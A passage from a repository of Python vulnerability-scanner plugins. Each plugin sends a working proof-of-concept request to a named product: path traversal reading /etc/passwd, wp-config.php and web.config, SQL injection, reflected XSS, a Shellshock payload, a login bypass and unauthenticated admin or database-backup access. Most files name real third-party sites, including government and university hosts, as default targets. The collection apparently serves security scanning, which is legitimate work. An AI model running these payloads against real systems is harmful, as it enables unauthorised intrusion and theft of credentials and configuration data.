16 |  
17 | if __name__ == '__main__': 
18 |     from dummy import *
19 |     audit(assign('fsmcms', 'http://www.wuda.gov.cn/')[1])
20 | 	
21 | 


--------------------------------------------------------------------------------
/plugins/hf_firewall/1997.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #info:http://www.wooyun.org/bugs/wooyun-2015-0130135
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == "hf_firewall":
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     url = arg + 'setdomain.php?action=list'
12 |     code, head, res, errcode, _ = curl.curl2(url)
13 |     if code==200 and '域名地址' in res:
14 |         security_warning("皓峰硬件防火墙系统越权访问漏洞%s"%url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('hf_firewall', 'http://202.70.26.137:8080/')[1])


--------------------------------------------------------------------------------
/plugins/huaficms/2647.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:华飞科技建站系统禁用js可以访问后台可以添加管理
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-083888
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="huaficms":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"admin/User/manageadmin.aspx"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and 'addadmin.aspx' in res:
17 |         security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('huaficms','http://www.huafi.com/')[1])
22 |     audit(assign('huaficms','http://www.hggfj.com/')[1])


--------------------------------------------------------------------------------
/plugins/iceflow_vpn_router/1937.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #from:http://www.wooyun.org/bugs/wooyun-2010-0134377
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == 'iceflow_vpn_router':
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     poc = arg + 'log/system.log'
12 |     code, head, res, errcode, _ = curl.curl(poc)
13 |     if code == 200 and 'login successfully' in res:
14 |         security_hole(poc)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('iceflow_vpn_router', 'http://221.202.29.20:8080/')[1])


--------------------------------------------------------------------------------
/plugins/suyaxing2004/1132.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-090403
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "suyaxing2004":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'ws2004/SysManage/UserManage/SysManage/editxml.asp?ID=1'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and '<PassWords>' in res:
14 |         security_hole('Find admin passwd in '+arg+payload)
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('suyaxing2004', 'http://www.fzjcxx.cn/')[1])


--------------------------------------------------------------------------------
/plugins/weaver_oa/2498.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | 
 4 | #Author:404
 5 | #Name:   泛微e-office 任意文件下载(应该不重复)
 6 | #Refer:
 7 | import re
 8 | def assign(service,arg):
 9 |     if service=="weaver_oa":
10 |         return True,arg 
11 |     
12 | def  audit(arg):
13 |     url=arg+"E-mobile/Data/downfile.php?url=123"
14 |     code,head,res,errcode,_=curl.curl2(url)
15 |     if code == 200:
16 |         m = re.search('No error in <b>([^<]+)</b>', res)
17 |         if m:
18 |             security_info(m.group(1))
19 |             
20 | if __name__=="__main__":
21 |     from dummy import *
22 |     
23 |     audit(assign('weaver_oa','http://122.224.149.30:8082/')[1])


--------------------------------------------------------------------------------
/plugins/appcms/1784.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:小光
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2015-0139684
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'appcms':
 9 |         return True, arg
10 | 
11 | def audit(arg):            
12 |     payload = 'index.php?tpl=../../install/templates/step4.php'
13 |     url = arg + payload 
14 |     code, head, res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and 'host' in res and 'dbpass' in res :
16 |         security_warning(url + '   :Infromation Traversal')
17 |     
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('appcms','http://gotoxy.cn/')[1])


--------------------------------------------------------------------------------
/plugins/emlog/1257.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 01001000entai
 4 | #_PlugName_ = emlog database
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-099976
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'emlog':
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = 'content/backup/EMLOG_~1.SQL'
13 |     target = arg + payload
14 |     code, head, body, errcode, final_url = curl.curl2(target);
15 |     if code == 200 and '#version:emlog' in body:
16 |         security_warning(target)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('emlog', 'http://127.0.0.1/emlog/')[1])


--------------------------------------------------------------------------------
/plugins/extmail/1162.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-015005
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "extmail":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'extmail/cgi/index.cgi?__mode=<script>alert(\'testvul\')</script>'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and 'testvul' in res:
14 |         security_info('反射型 xss '+arg+payload)         
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('extmail', 'http://mail.ca.suzhou.gov.cn/')[1])
19 | 	
20 | 


--------------------------------------------------------------------------------
/plugins/hanweb/861.py:
--------------------------------------------------------------------------------
 1 | #/usr/bin/python
 2 | #-*- coding: utf-8 -*-
 3 | #Refer http://www.wooyun.org/bugs/wooyun-2014-076816
 4 | #__Author__ = Mr.R
 5 | #_PlugName_ = JCMS_XSS Plugin
 6 | #_FileName_ = JCMS_XSS.py
 7 | 
 8 | def assign(service, arg):
 9 | 	if service == 'hanweb':
10 | 		return True,arg
11 | 
12 | def audit(arg):
13 | 	url=arg+'jcms/m_5_b/selmulti_column.jsp?type=1&userId=2222222%2b><script>alert(/test/)</script>'
14 | 	code,head,body,errcode,fina_url=curl.curl(url)
15 | 	if code==200 and '<script>alert(/test/)</script>' in body :
16 | 		security_info(url)
17 | if __name__ == '__main__':
18 |   from dummy import *
19 |   audit(assign('hanweb','http://www.wugang.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/phpcms/120.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'ver007'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "phpcms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     _, head, body, _, _ = curl.curl(url + '/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ')
12 |     if body and body.find('authkey') != -1:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('phpcms', 'http://www.example.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/fsmcms/1463.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | # title:fsmcms任意文件下载
 4 | #http://www.wooyun.org/bugs/wooyun-2010-0116270
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "fsmcms":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'fsmcms/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and '[fonts]' in res and '[extensions]' in res and '[files]' in res:
16 |         security_warning(url)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('fsmcms', 'http://www.gxhzedu.net/')[1])


--------------------------------------------------------------------------------
/plugins/heeroa/1286.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 01001000entai
 4 | #_PlugName_ = heeroa
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-058143
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'heeroa':
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = "vfs?path=../../../../../../../../../../etc/passwd"
13 |     target = arg + payload
14 |     code, head, res, errcode, final_url = curl.curl2(target);
15 |     if code == 200 and "root:" in res:
16 |         security_hole(target)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('heeroa', 'http://oa.lit.edu.cn/litoa/')[1])


--------------------------------------------------------------------------------
/plugins/ipowercms/1139.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-0110152
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "ipowercms":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'm/manager/login.xml.php?username=admin\'%20or%20\'a\'=\'a&password=123&vcode='
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and '<v>1</v>' in res:
14 |         security_hole('万能密码 '+arg+payload)
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('ipowercms', 'http://www.cqukja.com/')[1])
19 | 	
20 | 


--------------------------------------------------------------------------------
/plugins/iwms/2648.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:IWMS系统后台绕过&整站删除
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-083888
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="iwms":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"Admin/pages/fileManager.aspx?bp="
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and "btnCreateFolder" in res and 'FileUpload1' in res:
17 |         security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('iwms','http://www.hbgsny.com/')[1])
22 |     audit(assign('iwms','http://www.lixinzhiyao.com/')[1])


--------------------------------------------------------------------------------
/plugins/php168/1252.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:IOT
 4 | #refer:http://www.51cto.com/art/200812/100919.htm 
 5 | import base64
 6 | def assign(service,arg):
 7 |     if service == "php168":
 8 |         return True,arg
 9 | def audit(arg):
10 |     base=arg+'/cache/adminlogin_logs.php' 
11 |     s=base64.b64encode(base)
12 |     payload = "job.php?job=download&url=%s" % s 
13 |     url = arg + payload
14 |     code ,head,res,body,_ = curl.curl(url)
15 |     if code == 200 and 'logdb' in res:
16 |         security_warning(url)    
17 | 
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('php168', 'http://www.hhzx.cn/')[1])


--------------------------------------------------------------------------------
/plugins/thinkox/616.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'K0thony' 
 4 | def assign(service, arg): 
 5 |     if service == "thinkox": 
 6 |         return True, arg 
 7 | 
 8 | def audit(arg):
 9 |     payload = 'index.php?s=/forum/lzl/lzllist/to_f_reply_id/1%20and%201=2)union%20select%201,2,3,4,md5(3.14),6,7,8,9%23.html' 
10 |     verify_url = arg + payload 
11 |     code, head,res, errcode, _ = curl.curl(verify_url) 
12 |     if code == 200 and "4beed3b9c4a886067de0e3a094246f78" in res: 
13 |         security_hole(verify_url)
14 | 
15 | if __name__ == '__main__': 
16 |     from dummy import * 
17 |     audit(assign('thinkox', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/175.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '半块西瓜皮'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "wordpress":
 7 |         return True, arg
 8 | def audit(args):
 9 |     payload = 'wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php'
10 |     verify_url = args + payload
11 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
12 |     if code ==200 and 'html5-mp3-player-with-playlist/html5plus/playlist.php' in content:
13 |         security_info(verify_url)
14 | 
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('wordpress', 'http://www.example.com/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/wordpress/241.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #refer :http://www.exploit-db.com/exploits/34436/
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "wp-content/force-download.php?file=../wp-config.php"
12 |     code, head, res, errcode,finalurl =  curl.curl(url)
13 |     if res.find('DB_HOST') != -1 and res.find('DB_PASSWORD') != -1:
14 |         security_hole('Local File Inclusion Vulnerability:' + url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('wordpress', 'http://127.0.0.1/wordpress/')[1])


--------------------------------------------------------------------------------
/plugins/www/139.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: cp936 -*-
 2 | """
 3 | scanner - Network scanner.
 4 | Author : Tommy.
 5 | """
 6 | __version__ = '1.0'
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "www":
10 |         if "cgi-bin" in arg:
11 |             return True, arg
12 | 
13 | def audit(arg):
14 |     payload = '''() { :;}; echo d5f4f931d08210b1ed6e98d26b6318b6:'''
15 |     code, head, res, errcode, _ = curl.curl('-A "%s" %s' %(payload,arg))
16 |     if code == 200 and 'd5f4f931d08210b1ed6e98d26b6318b6' in head+res:
17 |         security_hole(arg)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('www', 'http://manticore.2y.net/cgi-bin/dlwct.sh')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/cmseasy/220.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Medici.Yan'
 4 | #Cmseasy /demo.php 处反射型XSS
 5 | #http://www.wooyun.org/bugs/wooyun-2014-069363
 6 | def assign(service, arg):
 7 | 	if service == "cmseasy":
 8 | 		return True, arg
 9 | def audit(arg):
10 |         desurl=arg+"demo.php?time=alert(e10adc3949ba59abbe56e057f20f883e)"
11 |         code,head,content,errcode,re_url=curl.curl(desurl)
12 |         if code==200 and 'alert(e10adc3949ba59abbe56e057f20f883e)' in content:
13 |               security_info(desurl)
14 |               
15 | if __name__ == '__main__':
16 | 	from dummy import *
17 | 	audit(assign('cmseasy', 'http://www.example.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/esccms/2555.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:易创思教育建站系统未授权访问可查看所有注册用户
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-086704
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="esccms":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"operationmanage/selectunitmember.aspx"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and  "doPostBack" in res and 'gvUnitMember' in res:
15 |             security_hole(url)
16 | 
17 | if __name__=="__main__":
18 |     from dummy import *
19 |     audit(assign('esccms','http://www.yclfzx.com/')[1])
20 |     audit(assign('esccms','http://www.qzxx.net/')[1])


--------------------------------------------------------------------------------
/plugins/hanweb/2421.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:大汉网络任意文件包含漏洞
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-092339
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "hanweb":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd"
12 |     code, head, res, errcode, _ = curl.curl2(payload)
13 |     if code ==200 and 'root' in res :
14 |          security_info(payload+':Any reading ' )
15 |          
16 | if __name__ == '__main__':
17 |         from dummy import *
18 |         audit(assign('hanweb','http://www.sinoagent.com/')[1])


--------------------------------------------------------------------------------
/plugins/supesite/169.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "supesite":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     url = url + 'batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23'
11 |     code, head, body, _, _ = curl.curl(url)
12 |     if code == 200:
13 |         if body and body.find('35fd19fbe470f0cb5581884fa7006') != -1:
14 |             security_hole(url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('supesite', 'http://www.jhgjs.com/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/urp/193.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #URP教务系统任意文件下载漏洞
 4 | #__author__ = 'range'
 5 | 
 6 | import  re
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "urp":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     url = arg
14 |     payload = '/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf'
15 |     verify_url = url +  payload
16 |     code, head, res, errcode, _ = curl.curl(verify_url)
17 |     if 'jdbc' in res:
18 |         security_hole(verify_url)
19 | 
20 | 
21 | 
22 | if __name__ == '__main__':
23 |     from dummy import *
24 |     audit(assign('urp', 'http://www.example.com/')[1])
25 | 


--------------------------------------------------------------------------------
/plugins/xycms/1981.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 11111
 4 | #_PlugName_ = XYCMS环保设备企业建站系统数据库下载
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0100664
 6 | import re
 7 | def assign(service, arg):
 8 |     if service == 'xycms':
 9 |         return True, arg
10 | def audit(arg):
11 |     payload='xydata/xycms.mdb'
12 |     target=arg+payload
13 |     header='Range:  bytes=0-100'
14 |     code, head, body, error, _ = curl.curl2(target,header=header)
15 |     if code==206 and 'Standard Jet DB' in body:
16 |         security_hole(target)
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('xycms', 'http://www.lyyd.com/')[1])


--------------------------------------------------------------------------------
/plugins/cmseasy/219.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Medici.Yan'
 4 | #Cmseasy bbs/index.php 处反射型XSS
 5 | #http://www.2cto.com/Article/201409/334119.html
 6 | def assign(service, arg):
 7 | 	if service == "cmseasy":
 8 | 		return True, arg
 9 | def audit(arg):
10 |         desurl=arg+"bbs/index.php/%27%2Balert(e10adc3949ba59abbe56e057f20f883e)%2B%27/?case=file"
11 |         code,head,content,errcode,re_url=curl.curl(desurl)
12 |         if code==200 and 'alert(e10adc3949ba59abbe56e057f20f883e)' in content:
13 |               security_info(desurl)
14 | if __name__ == '__main__':
15 | 	from dummy import *
16 | 	audit(assign('cmseasy', 'http://www.example.com/')[1])
17 | 


--------------------------------------------------------------------------------
/plugins/discuz/1507.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #_Author_= hear7v 
 4 | #_Refer_ = http://www.wooyun.org/bugs/wooyun-2015-0131386
 5 | def assign(service, arg):
 6 |     if service == "discuz":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = 'plugin.php?action=../../../../../robots.txt%00&id=dc_mall'
11 |     url = arg + payload
12 |     code, head, res, errcode, _ = curl.curl(url)
13 |     if code == 200 and "User-agent" in res and 'robots.txt for Discuz' in res and 'Disallow:' in res:
14 |         security_hole(url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('discuz', 'http://www.zhukaocidian.com/')[1])


--------------------------------------------------------------------------------
/plugins/fangwei/484.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "fangwei":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "index.php?m=Goods&a=showByUname&uname=%2527 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)%23"
10 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
11 | 
12 | 	if code == 200:
13 | 		if "for key 'group_key'" in res:
14 | 			security_hole('find sql injection: ' + arg+payload)
15 | 
16 | if __name__ == "__main__":
17 | 	from dummy import *
18 | 	audit(assign('fangwei', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/feiyuxing_router/2025.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #ref:http://www.wooyun.org/bugs/wooyun-2010-070579
 4 | 
 5 | import urlparse
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == 'feiyuxing_router':
10 |         arr = urlparse.urlparse(arg)
11 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
12 | 
13 | def audit(arg):
14 |     poc1 = arg + '.htpasswd'
15 |     code, head, res, errcode, _ = curl.curl(poc1)
16 |     if code==200 and 'admin:$' in res:
17 |         security_hole("Router vulnerable!:"+poc1)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('feiyuxing_router', 'http://pos.disshanghai.com/')[1])


--------------------------------------------------------------------------------
/plugins/kesioncms/1280.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #__Refer___ = https://packetstormsecurity.com/files/125632/Kentico-CMS-7.0.75-User-Enumeration.html
 3 | 
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "kesioncms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     code, head, res, errcode, _ = curl.curl(url + 'CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx')
13 |     if code == 200 and '<td style="white-space:nowrap;">' in res:
14 |        security_info("Kentico CMS user name leakage success")
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('kesioncms', 'http://www.sqlpassnepal.org/')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/2660.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #行政审批系统一处系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0126218
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "lianbangsoft":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'workplate/xzsp/lbsxdict/add.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'btn_mouseover' in res:
17 |         security_info(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('lianbangsoft','http://www.sdwlxzfw.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/tianrui_lib/2467.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:天睿电子图书管理系统任意增加管理员
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-0121549
 5 | #Author:xq17
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="tianrui_lib":
 9 |         return True,arg
10 |     
11 | def audit(arg):
12 |     payload = "useradd.asp"
13 |     url=arg+payload
14 |     code, head, res, errcode,finalurl =  curl.curl(url)
15 | 
16 |     if code !=0 and 'password' in res and 'reset' in res:
17 |         security_hole('find bug: ' + arg)
18 | 
19 |                
20 | if  __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign("tianrui_lib","http://218.92.71.5:1085/trebook/")[1])


--------------------------------------------------------------------------------
/plugins/topsec_topaudit/1457.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #ref http://wooyun.org/bugs/wooyun-2015-0116821
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "topsec_ta-w" or service == "topsec_topaudit":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'log/log_export.php'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and '\tsuperman\t' in res and '<p>' not in res:
16 |         security_hole(url)
17 |                         
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('topsec_ta-w', 'http://211.137.103.100:8080/')[1])


--------------------------------------------------------------------------------
/plugins/whezeip/1356.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Warsong
 4 | #_PlugName_ = 万户ezeip任意文件下载
 5 | #_Function_ = 插件格式
 6 | #_FileName_ = whezeip_Download_Anything.py
 7 | def assign(service, arg):
 8 |     if service == "whezeip": 
 9 |         return True, arg 
10 | 
11 | def audit(arg):
12 | 
13 |     payload='download.ashx?files=../web.config'
14 |     url=arg+payload
15 |     code,head,body,errcode,fina_url=curl.curl(url)
16 |     if code == 200 and 'rootRollingFile' in body and 'cachingConfiguration' in body:
17 |         security_warning(url)
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('whezeip', 'http://www.zsty.org/')[1])


--------------------------------------------------------------------------------
/plugins/whezeip/1406.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #__Author__= Sevsea
 4 | #_PlugName= 万户download_old.jsp任意文件下载
 5 | #_FileName_= wanhu_download_old.py
 6 | def assign(service,arg):
 7 |     if service == "whezeip":
 8 |         return True,arg
 9 | 
10 | def audit(arg):
11 |     payload='defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml'
12 |     url=arg+payload
13 |     code,head,body,errcode,fina_url=curl.curl(url)
14 |     if code ==200 and '<?xml version=' in body and '<servlet-name>' in body:
15 |         security_warning(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('whezeip','http://oa.zjcof.com.cn/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/184.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '冷不冷'
 4 | #http://www.exploit-db.com/exploits/36039/
 5 | 
 6 | import  re
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "wordpress":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     url = arg
14 |     payload = '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
15 |     verify_url = url +  payload
16 |     code, head, res, errcode, _ = curl.curl(verify_url)
17 |     if 'DB_PASSWORD' in res:
18 |         security_hole(verify_url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/439.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #by lkz
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "wordpress":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = '?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1%20union%20all%20select%20MD5(123),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'
11 |     url = arg + payload
12 |     code,head,body, _,_ = curl.curl(url)
13 |     if code == 200 and '202cb962ac59075b964b07152d234b70' in body:
14 |         security_hole(payload)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
